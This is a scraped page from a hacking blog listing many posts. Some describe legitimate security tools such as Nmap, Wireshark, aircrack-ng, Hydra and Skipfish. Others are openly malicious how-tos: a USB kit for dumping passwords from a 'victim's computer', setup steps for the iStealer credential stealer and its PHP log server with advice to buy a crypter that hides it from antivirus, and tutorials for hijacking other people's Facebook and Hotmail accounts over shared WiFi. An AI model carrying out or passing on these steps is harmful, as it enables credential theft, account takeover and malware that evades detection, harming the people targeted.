sdr

Click TO See Android Tricks Click To See Facebook Tricks Windows 8 Launchs

ads

Showing posts with label Hacking Tools. Show all posts
Showing posts with label Hacking Tools. Show all posts

IE PassView v1.16 –Internet Explorer Password Recover

IE PassViewWhen you enter a Web page that contains a form with user/password fields and a login button, Internet Explorer may ask you if you want to save the password, after pressing the login button. Saving your password in the browser can help you to access the website without input your account again, but for some case your password potential to be stealing by other users.

IE PassView is a small utility that reveals the passwords stored by Internet Explorer Web browser. It supports all versions of Internet Explorer, from version 4.0 and up to 8.0.

How to use IE PassView
IE PassView doesn't require any installation (portable), After download and extract the file, you can run the program by clicking the executable file (iepv.exe)
In the main windows you can see if there is store password in Internet Explorer. If you want to delete the password store in the Internet Explorer browser, simply just click the delete button.
Be aware that when you have a Web site that has multiple stored passwords, deleting the one of the passwords also remove all the other passwords for the same Web site. The reason for that is that all the passwords of a Web site are stored in the same entry.

• License: Free
• Operating system: Windows Me, Windows XP, Windows 2000, Windows 98
• Publisher: nirsoft.net/
• Size: 49.36K
Download IE PassView
READ MORE - IE PassView v1.16 –Internet Explorer Password Recover

USB Steals Pc Passwords


Info:
USB Steals Pc Passwords
Tweaked USB that steals every passwords including licences.

Instructions:
1.Decompress the archive and put all the files located in the folder "USBThief"into a USB.
2.Insert the USB in your victim's computer.
3.View folder "dump" to see the passwords.

Click On Download Button To Download



Password:
www.dragonplannet.com
READ MORE - USB Steals Pc Passwords

iStealer 5.1 Tested (Working)


How to Use:

ISTEALER 5 AND TUTORIAL

Something like 65% detected. I recommend buying a FUD private crypter.

I bought it from an official reseller. This could still be backdoored, but the chances are extremely low. If you want to verify, please do.

Also, iStealer v6.0 is coming soon. You will probably be impressed.
Want to post this elsewhere? Go ahead, but please use my Rapidshare link

Step 1:
Register at

Step 2:
Go to UserCP.
Click "Create/delete MySQL database"

Name the database what you want, it will include your username.
In this example my username will be "example".
I have named my database "example_db"
Press "Create Database"

Now for the user, I have named mine "example_user"
Password can be anything, mine will be "passw0rd"
Press "Create User"

For Assign Priviledges, make sure the user and database are selected on the list.
When all boxes are ticked, press "Assign Priviledges"

Step 3:
Download iStealer v5.0.1 (MOD)
Click On Download Button To Download











Note:- It Contains A Small Virus which will not affect your PC Tested by Me.

Step 4:
Open \iStealer5.1\PHP Logger\index.php and edit the configuration information.
All of the information is commented at the side, it's clear what it is. Leave localhost.

Step 5:
At BAH, go to "File manager" in the User CP and upload index.php style.css
After this, your iStealer is set up,


Log in there to view your logs. Simple enough.

Step 6:
Open iStealer 5.0.1 and fill in all of the necessary information.
The "Url" will be


Complete!
READ MORE - iStealer 5.1 Tested (Working)

How To Hack MSN & Hotmail Password in 2012

How To Hack MSN & Hotmail Password in 2012. MSN and Hotmail is very widely used mailing and chat services. So, today ill tell you all about the hacking of MSN Account and hacking of Hotmail Account With and Without any tool in some easy steps. As you know that MSN and Hotmail Hacking Is Not Easy but after reading this tutorial you will say that, you can hack MSN and Hotmail Account You self. First of all ill tell you about the MSN Password hacking tool that is Password Recovery For MSN. This tool could also be used by forensic scientists to hack MSN password stored on the local system. This is only valid for those cases when after clicking the “Sign-in” button in your MSN or Windows Live messenger you are able to login without having to enter your MSN password. The program works by finding saved MSN passwords in the Windows credentials manager, extracting them and hacking them to show in a user-friendly readable format:

<< Click Here To Download >> 

Belive me its working great 

 


READ MORE - How To Hack MSN & Hotmail Password in 2012

How To Hack Into Computers Through WiFi

The internet is ever growing and you and I are truly pebbles in a vast ocean of information. They say what you don’t know can’t hurt you. When it comes to the Internet believe quite the opposite. On the Internet there a millions and millions of computer users logging on and off on a daily basis. Information is transferred from one point to another in a heartbeat. Amongst those millions upon millions of users, there’s you.
In this tutorial i am going to show you how to to access someone’s facebook, youtube, and many other accounts which is using the same WiFi as you.
You need:
  1. Mozilla Firefox
  2. Firesheep – A Firefox extension that demonstrates HTTP session hijacking attacks.
  3. WinPcap – WinPcap is an open source library for packet capture and network analysis for the Win32 platforms. It includes a kernel-level packet filter, a low-level dynamic link library (packet.dll), and a high-level and system-independent library.
Step 1: Install WinPcap then drag the Firesheep add-on, and put it on the Firefox icon. Firefox will open and will ask you to install the add on. Install it and restart Firefox.
Step 2: Open the add-on (You can do it by clicking on View -> Sidebar -> Firesheep), then click on Start Capturing and it’ll start capturing, and as soon as somebody logs in any account it’ll show up the logs, and then you can access their account.
Simple, but functional and VERY effective method to hack someones facebook, youtube, myspace, etc. account through WiFi.
READ MORE - How To Hack Into Computers Through WiFi

aircrack-ng – WEP and WPA-PSK Key Cracking Program


aircrack is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, thus making the attack much faster compared to other WEP cracking tools. In fact, aircrack is a set of tools for auditing wireless networks.

Aircrack-ng is the next generation of aircrack with lots of new features:
  • Better documentation (wiki, manpages) and support (Forum, trac, IRC: #aircrack-ng on Freenode).
  • More cards/drivers supported
  • New WEP attack: PTW
  • More OS and platforms supported
  • Fragmentation attack
  • Improved cracking speed
  • WEP dictionary attack
  • Capture with multiple cards
  • New tools: airtun-ng, packetforge-ng (improved arpforge), wesside-ng and airserv-ng
  • Optimizations, other improvements and bug fixing
Download the latest version of aircrack-ng here:

Linux – aircrack-ng-0.9.1.tar.gz
Windows – aircrack-ng-0.9.1-win.zip
READ MORE - aircrack-ng – WEP and WPA-PSK Key Cracking Program

15 Hacking Tools & Security Utilities

A hacking tool is a program designed to assist with hacking, or a piece of software which can be used for hacking purposes.

Examples include Nmap, Nessus, John the Ripper, SuperScan, p0f, and Winzapper. Bribes, have also been designated as among the most potent hacking tools, due to its potential exploitation in social engineering attacks. Occasionally, common software such as ActiveX is exploited as a hacking tool as well and i'll be sharing most of this tools with you today.


1. Nmap


I think everyone has heard of this one, recently evolved into the 4.x series.


Nmap (“Network Mapper”) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source.


Can be used by beginners (-sT) or by pros alike (–packet_trace). A very versatile tool, once you fully understand the results.


Get Nmap Here


2. Nessus Remote Security Scanner


Recently went closed source, but is still essentially free. Works with a client-server framework.


Nessus is the world’s most popular vulnerability scanner used in over 75,000 organizations world-wide. Many of the world’s largest organizations are realizing significant cost savings by using Nessus to audit business-critical enterprise devices and applications.


Get Nessus Here


3. John the Ripper


Yes, JTR 1.7 was recently released!


John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.


You can get JTR Here


4. Nikto


Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired).


Nikto is a good CGI scanner, there are some other tools that go well with Nikto (focus on http fingerprinting or Google hacking/info gathering etc, another article for just those).


Get Nikto Here


5. SuperScan


Powerful TCP port scanner, pinger, resolver. SuperScan 4 is an update of the highly popular Windows port scanning tool, SuperScan.


If you need an alternative for nmap on Windows with a decent interface, I suggest you check this out, it’s pretty nice.


Get SuperScan Here


6. p0f


P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the operating system on:


– machines that connect to your box (SYN mode),

– machines you connect to (SYN+ACK mode),
– machine you cannot connect to (RST+ mode),
– machines whose communications you can observe.

Basically it can fingerprint anything, just by listening, it doesn’t make ANY active connections to the target machine.


Get p0f Here


7. Wireshark (Formely Ethereal)


Wireshark is a GTK+-based network protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and to give Wireshark features that are missing from closed-source sniffers.


Works great on both Linux and Windows (with a GUI), easy to use and can reconstruct TCP/IP Streams! Will do a tutorial on Wireshark later.


Get Wireshark Here


8. Yersinia


Yersinia is a network tool designed to take advantage of some weakeness in different Layer 2 protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems. Currently, the following network protocols are implemented: Spanning Tree Protocol (STP), Cisco Discovery Protocol (CDP), Dynamic Trunking Protocol (DTP), Dynamic Host Configuration Protocol (DHCP), Hot Standby Router Protocol (HSRP), IEEE 802.1q, Inter-Switch Link Protocol (ISL), VLAN Trunking Protocol (VTP).


The best Layer 2 kit there is.


Get Yersinia Here


9. Eraser


Eraser is an advanced security tool (for Windows), which allows you to completely remove sensitive data from your hard drive by overwriting it several times with carefully selected patterns. Works with Windows 95, 98, ME, NT, 2000, XP and DOS. Eraser is Free software and its source code is released under GNU General Public License.


An excellent tool for keeping your data really safe, if you’ve deleted it..make sure it’s really gone, you don’t want it hanging around to bite you in the ass.



Get Eraser Here.



10. PuTTY


PuTTY is a free implementation of Telnet and SSH for Win32 and Unix platforms, along with an xterm terminal emulator. A must have for any h4x0r wanting to telnet or SSH from Windows without having to use the crappy default MS command line clients.



Get PuTTY Here.


11. LCP


Main purpose of LCP program is user account passwords auditing and recovery in Windows NT/2000/XP/2003. Accounts information import, Passwords recovery, Brute force session distribution, Hashes computing.



Get LCP Here



12. Cain and Abel


My personal favourite for password cracking of any kind.


Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort.


Get Cain and Abel Here


13. Kismet


Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic.


A good wireless tool as long as your card supports rfmon (look for an orinocco gold).


Get Kismet Here


14. NetStumbler


Yes a decent wireless tool for Windows! Sadly not as powerful as it’s Linux counterparts, but it’s easy to use and has a nice interface, good for the basics of war-driving.


NetStumbler is a tool for Windows that allows you to detect Wireless Local Area Networks (WLANs) using 802.11b, 802.11a and 802.11g. It has many uses:

    * Verify that your network is set up the way you intended.
    * Find locations with poor coverage in your WLAN.
    * Detect other networks that may be causing interference on your network.
    * Detect unauthorized “rogue” access points in your workplace.
    * Help aim directional antennas for long-haul WLAN links.
    * Use it recreationally for WarDriving.

Get NetStumbler Here



15. hping


To finish off, something a little more advanced if you want to test your TCP/IP packet monkey skills.


hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features.


Get hping Here
READ MORE - 15 Hacking Tools & Security Utilities

Password Cracking with Rainbowcrack and Rainbow Tables

What is RainbowCrack & Rainbow Tables?

RainbowCrack is a general propose implementation of Philippe Oechslin’s faster time-memory trade-off technique.


In 1980 Martin Hellman described a cryptanalytic time-memory trade-off which reduces the time of cryptanalysis by using precalculated data stored in memory. This technique was improved by Rivest before 1982 with the introduction of distinguished points which drastically reduces the number of memory lookups during cryptanalysis. This improved technique has been studied extensively but no new optimisations have been published ever since.
You can find the official Rainbowcrack project here, where you can download the latest version of Rainbowcrack.
In short, the RainbowCrack tool is a hash cracker. A traditional brute force cracker try all possible plaintexts one by one in cracking time. It is time consuming to break complex password in this way. The idea of time-memory trade-off is to do all cracking time computation in advance and store the result in files so called “rainbow table”.

Basically these types of password crackers are working with pre-calculated hashes of ALL passwords available within a certain character space, be that a-z or a-zA-z or a-zA-Z0-9 etc.

These files are called
Rainbow Tables.

You are trading speed for memory and disk space, the Rainbow Tables can be VERY large.


Be warned though, Rainbow tables can be defeated by salted hashes, if the hashes are not salted however and you have the correct table, a complex password can be cracked in a few minutes rather than a few weeks or months with traditional
brute forcing techniques.

So where do I get these Rainbow Tables?


You can generate them yourself with RainbowCrack, this will take a long time, and a lot of diskspace.


Project Shmoo is offering downloads of popular Rainbow Tables via
BitTorrent.

http://rainbowtables.shmoo.com/


If you wanted to, you could even buy the tables from
http://www.rainbowtables.net/.

Or these guys, not free but cheap
http://www.rainbowcrack-online.com/

Some free tables here
http://wired.s6n.com/files/jathias/index.html

What software is available for use with Rainbow Tables?


There is of course the original RainbowCrack as mentioned above.


Then there is:


Ophcrack


Ophcrack
is a Windows password cracker based on a time-memory trade-off using rainbow tables. This is a new variant of Hellman’s original trade-off, with better performance.

Cain and Abel
(newly added support for Rainbow Tables)
Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. 

Cain and Abel is personally my favourite fully featured password whacking tool, it also has a good packet sniffer, which grabs and decodes passwords and many methods for password cracking. The interface is decent too. I’ll write more on how to get the most out of Cain later.


L0phtcrack or LC5

LC5 is the latest version of L0phtCrack, the award-winning password auditing and recovery application used by thousands of companies worldwide.

Please note this is a COMMERCIAL product.


LCP

Main purpose of LCP program is user account passwords auditing and recovery in Windows NT/2000/XP/2003
Thankfully there is a freeware alternative to LC5 in the form of LCP.

Other Resources


http://www.rainbowcrack.com/

http://sarcaprj.wayreth.eu.org/

http://passcracking.com/

http://www.md5lookup.com/

http://www.plain-text.info/

http://ap0x.headcoders.net/xHashBrutter.rar

http://www.loginrecovery.com/
READ MORE - Password Cracking with Rainbowcrack and Rainbow Tables

THC-Hydra - A very fast network logon cracker

THC-HydraA very fast network logon cracker which support many different services. Have a look at the feature sets and services coverage page - including a speed comparison against ncrack and medusa!

Number one of the biggest security holes are passwords, as every password security study shows. Hydra is a parallized login cracker which supports numerous protocols to attack. New modules are easy to add, beside that, it is flexible and very fast.

Version 6.x was tested to compile cleanly on Linux, Windows/Cygwin, Solaris 11, FreeBSD 8.1 and OSX.

Currently this tool supports:

TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL, REXEC, irc, RSH, RLOGIN, CVS, SNMP, SMTP, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS, XMPP, ICQ, SAP/R3, LDAP2, LDAP3, Postgres, Teamspeak, Cisco auth, Cisco enable, AFP, Subversion/SVN, Firebird, LDAP2, Cisco AAA (incorporated in telnet module).

For HTTP, POP3, IMAP and SMTP, several login mechanisms like plain and MD5 digest are supported.

This tool is a proof of concept code, to give researchers and security consultants the possiblity to show how easy it would be to gain unauthorized access from remote to a system.

Disclaimer

  • This tool is for legal purposes only!
  • The GPLv3 applies to this code.
  • A special license expansion for OpenSSL is included which is required for the debian people
The Art of Downloading: Source and Binaries

1. The source code of state-of-the-art Hydra: hydra-6.3-src.tar.gz
(compiles on all UNIX based platforms - even MacOS X, Cygwin on Windows, ARM-Linux, etc.)

2. The source code of the stable tree of Hydra in case v6 gives you problems on unusual platforms:
hydra-5.9.1-src.tar.gz

3. The Win32/Cywin binary release: --- not anymore ---
Install cygwin from http://www.cygwin.com
and compile it yourself. If you do not have cygwin installed - how
do you think you will do proper securiy testing?

4. ARM and Palm binaries here are old and not longer maintained:
ARM: hydra-5.0-arm.tar.gz
Palm: hydra-4.6-palm.zip
READ MORE - THC-Hydra - A very fast network logon cracker

SIPVicious Tool Suite v0.2.6 – SIP/VoIP Security Auditing Tool


SIPVicious suite is a set of tools that can be used to audit SIP based VoIP systems. Why the name? Because the tools are not exactly the nicest thing on earth next to a SIP device. And the play on the sound seems to work. As an extra bonus, it rhymes with the name of Sex Pistol’s bass player.

It currently consists of five tools:


  • svmap – this is a sip scanner. Lists SIP devices found on an IP range
  • svwar – identifies active extensions on a PBX
  • svcrack – an online password cracker for SIP PBX
  • svreport – manages sessions and exports reports to various formats
  • svcrash – attempts to stop unauthorized svwar and svcrack scans
Requirements

Python – SIPVicious works on any system that supports python 2.4 or greater.


There’s a good blog post covering the new stuff here too, mainly svcrash:


How to crash SIPVicious – introducing svcrash.py


You can download SIPVicious v0.2.6 here:


sipvicious-0.2.6.zip

READ MORE - SIPVicious Tool Suite v0.2.6 – SIP/VoIP Security Auditing Tool

Angry IP Scanner 3.0 Beta 5

Angry Ip ScannerScanning of computer networks (searching for addresses with known properties) is a practice that is often used by both network administrators and crackers. Although it is widely accepted that activity of the latter is often illegal, most of the time they depend on exactly the same tools that can be used for perfectly legitimate network administration – just like a kitchen knife that can be used maliciously.

Thanks to the recent activity of mass-media on the subject (that popularized the wrong term for a cracker – a 'hacker'), nowadays every educated person more or less understands the reasons and goals that stand behind malicious cracking: curiosity, stealing of information, making damage, showing self-importance to the world, etc. But why do administrators need to scan their own networks?

There are plenty of answers: to check status of computers and various network devices (are they up or down), find spare addresses in statically-addressed networks, monitor the usage of server-type or P2P applications, make inventory of available hardware and software, check for recently discovered holes in order to patch them, and much more things that are even difficult to foresee.

Angry IP Scanner is widely-used open-source and multi-platform network scanner. As a rule, almost all such programs are open-source, because they are developed with the collaboration of many people without having any commercial goals. Secure networks are possible only with the help of open-source systems and tools, possibly reviewed by thousands of independent experts and hackers alike.

Certainly, there are other network scanners in existence (especially single-host port scanners), however, most of them are not cross-platform, are too simple and do not offer the same level of extensibility and user-friendliness as Angry IP Scanner. The program's target audience are network administrators, consultants, developers, who all use the tool every day and therefore have advanced requirements for usability, configurability, and extensibility. However, Angry IP Scanner aims to be very friendly to novice users as well.

You can download Angry IP Scanner here:

Angry IP Scanner
READ MORE - Angry IP Scanner 3.0 Beta 5

Skipfish 1.94b Released - Web Application Security Scanner

What is Skipfish?

Skipfish is an active web application security reconnaissance tool. It prepares an interactive sitemap for the targeted site by carrying out a recursive crawl and dictionary-based probes. The resulting map is then annotated with the output from a number of active (but hopefully non-disruptive) security checks. The final report generated by the tool is meant to serve as a foundation for professional web application security assessments.


Why should I bother with this particular tool?


A number of commercial and open source tools with analogous functionality is readily available (e.g., Nikto, Websecurify, Netsparker, w3af, Arachni); stick to the one that suits you best. That said, skipfish tries to address some of the common problems associated with web security scanners. Specific advantages include:


High performance:
500+ requests per second against responsive Internet targets, 2000+ requests per second on LAN / MAN networks, and 7000+ requests against local instances have been observed, with a very modest CPU, network, and memory footprint. This can be attributed to:
  • Multiplexing single-thread, fully asynchronous network I/O and data processing model that eliminates memory management, scheduling, and IPC inefficiencies present in some multi-threaded clients.
  • Advanced HTTP/1.1 features such as range requests, content compression, and keep-alive connections, as well as forced response size limiting, to keep network-level overhead in check.
  • Smart response caching and advanced server behavior heuristics are used to minimize unnecessary traffic.
  • Performance-oriented, pure C implementation, including a custom HTTP stack.
Ease of use: skipfish is highly adaptive and reliable. The scanner features:
  • Heuristic recognition of obscure path- and query-based parameter handling schemes.
  • Graceful handling of multi-framework sites where certain paths obey a completely different semantics, or are subject to different filtering rules.
  • Automatic wordlist construction based on site content analysis.
  • Probabilistic scanning features to allow periodic, time-bound assessments of arbitrarily complex sites.
Well-designed security checks: the tool is meant to provide accurate and meaningful results:

Handcrafted dictionaries offer excellent coverage and permit thorough $keyword.$extension testing in a reasonable timeframe.

  • Three-step differential probes are preferred to signature checks for detecting vulnerabilities.
  • Ratproxy-style logic is used to spot subtle security problems: cross-site request forgery, cross-site script inclusion, mixed content, issues MIME- and charset mismatches, incorrect caching directives, etc.
  • Bundled security checks are designed to handle tricky scenarios: stored XSS (path, parameters, headers), blind SQL or XML injection, or blind shell injection.
  • Report post-processing drastically reduces the noise caused by any remaining false positives or server gimmicks by identifying repetitive patterns.
Some users had a problem getting it running, it does have a dependency – assuming you are on a Debian based distro, all you need to do is:

apt-get install libidn11


The minum syntax required to run the tool would be:


./skipfish -o /home/youruser -W dictionaries/standard.wl http://yoursite.com


That should be enough to get you started!


It’s a pretty powerful tool and likely to pick up issues that Nessus or Nikto might miss.


You can download Skipfish 1.94b here:


skipfish-1.94b.tgz
READ MORE - Skipfish 1.94b Released - Web Application Security Scanner

xSQL Scanner: Security Audit Tool For MS-SQL & MySQL & Database Password Cracker

xSQL Scanner is a advanced SQL audit tool that allows users to find weak passwords and vulnerabilities on MS-SQL and MySQL database servers.

The objective of xSQLScanner is to assist the Security Analyst or Penetration Tester in auditing the security of MS-SQL and MySQL database servers.


xSQL Scanner

Features


Test for weak password fast;

Test for wear/user passwords;
Wordlist option;
Userlist option;
Portscanner
Range IP Address audit and more.

Windows –
xsqlscanner-1.2.zip
Linux – xsqlscan-mono.tgz
READ MORE - xSQL Scanner: Security Audit Tool For MS-SQL & MySQL & Database Password Cracker

MagicTree v1.1 – Penetration Testing Productivity Tool

MagicTree v1.1 – Penetration Testing
Have you ever spent ages trying to find the results of a particular portscan you were sure you did? Or grepping through a bunch of files looking for data for a particular host or service? Or copy-pasting bits of output from a bunch of typescripts into a report? I have certainly did, and when I heard about the release of this tool, my heart was filled with joy, at last I can now spend time doing the real thing, you know what i mean:).

Lets get it straight for those that don't or haven't had about it.


MagicTree is a penetration tester productivity tool. It is designed to allow easy and straightforward data consolidation, querying, external command execution and (yeah!) report generation. In case you wonder, "Tree" is because all the data is stored in a tree structure, and "Magic" is because it is designed to magically do the most cumbersome and boring part of penetration testing - data management and reporting.


Updates

  • Rapid 7 NeXpose XML import (both simple XML and full XML formats are supported)
  • Arachni XML import (as of 0.4.0.2. Thanks to Herman Stevens of Astyran for contribution)
  • OWASP Zed Attack Proxy XML import (development snapshot as of 6-Feb-2012)
  • New matrix query interface
  • Bug fix (#224) Remove orphan projects does not work anymore
  • Bug fix (#226) NPE in dumpData()
  • Bug fix (#239) “Uncaught exception in Swing thread: null. null” when saving a custom query into the repo
  • Bug fix (#241) Corrupted reference links in report templates
  • Bug fix (#242) Updated report templates to honor “ignore” status

You can download MagicTree here
READ MORE - MagicTree v1.1 – Penetration Testing Productivity Tool